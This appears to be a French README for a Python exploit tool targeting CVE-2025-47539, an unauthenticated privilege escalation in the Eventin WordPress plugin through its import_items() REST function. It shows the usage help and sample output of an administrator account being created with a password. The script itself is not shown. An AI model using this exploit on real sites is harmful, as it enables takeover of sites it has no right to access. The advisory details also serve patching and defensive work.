
Eventin <= 4.0.26 - Autorisation manquante menant à une escalade de privilèges non authentifiée
Le plugin Event Manager, Events Calendar, Tickets, Registrations – Eventin pour WordPress est vulnérable à une escalade de privilèges non authentifiée en raison d'un contrôle d'autorisation manquant dans la fonction import_items().
<= 4.0.26CVE-2025-475399.8 (Critique)7 mai 202515 mai 2025Des attaquants non authentifiés peuvent créer une requête malveillante vers l'API REST et créer un nouvel utilisateur avec les privilèges administrator sans aucune interaction utilisateur.
Ce script Python est un outil d'exploitation autonome pour CVE-2025-47539.
Il va :
⚠️ Ce script est destiné uniquement à des fins éducatives et à des évaluations de sécurité professionnelles.
usage: a.py [-h] -u URL
Exploit for CVE-2025-47539 # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g. http://target.com)
By:Nxploited (Khaled_alenazi) | [email protected]
[+] Exploitation succeeded
[+] Response:
{"message":"Successfully imported speaker"}
[+] Exploited Account Details
Name : Nxploited (Khaled_alenazi)
Email : [email protected]
Username : NxPloted
Password : nxploit123
Role : administrator
Exploit: By: Nxploited (Khaled_alenazi)
Use this script for educational purposes only. I am not responsible for your actions.
Plus de 10,000+ sites WordPress sont confirmés vulnérables à cette exploitation.
Tous les administrateurs de site utilisant Eventin ≤ 4.0.26 devraient mettre à jour immédiatement vers la version 4.0.28 ou ultérieure.
Cet outil est fourni uniquement à des fins éducatives et de tests d'intrusion autorisés.
Le créateur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce script.
By: Nxploited ( Khaled_Alenazi )
📧 Contact: [email protected]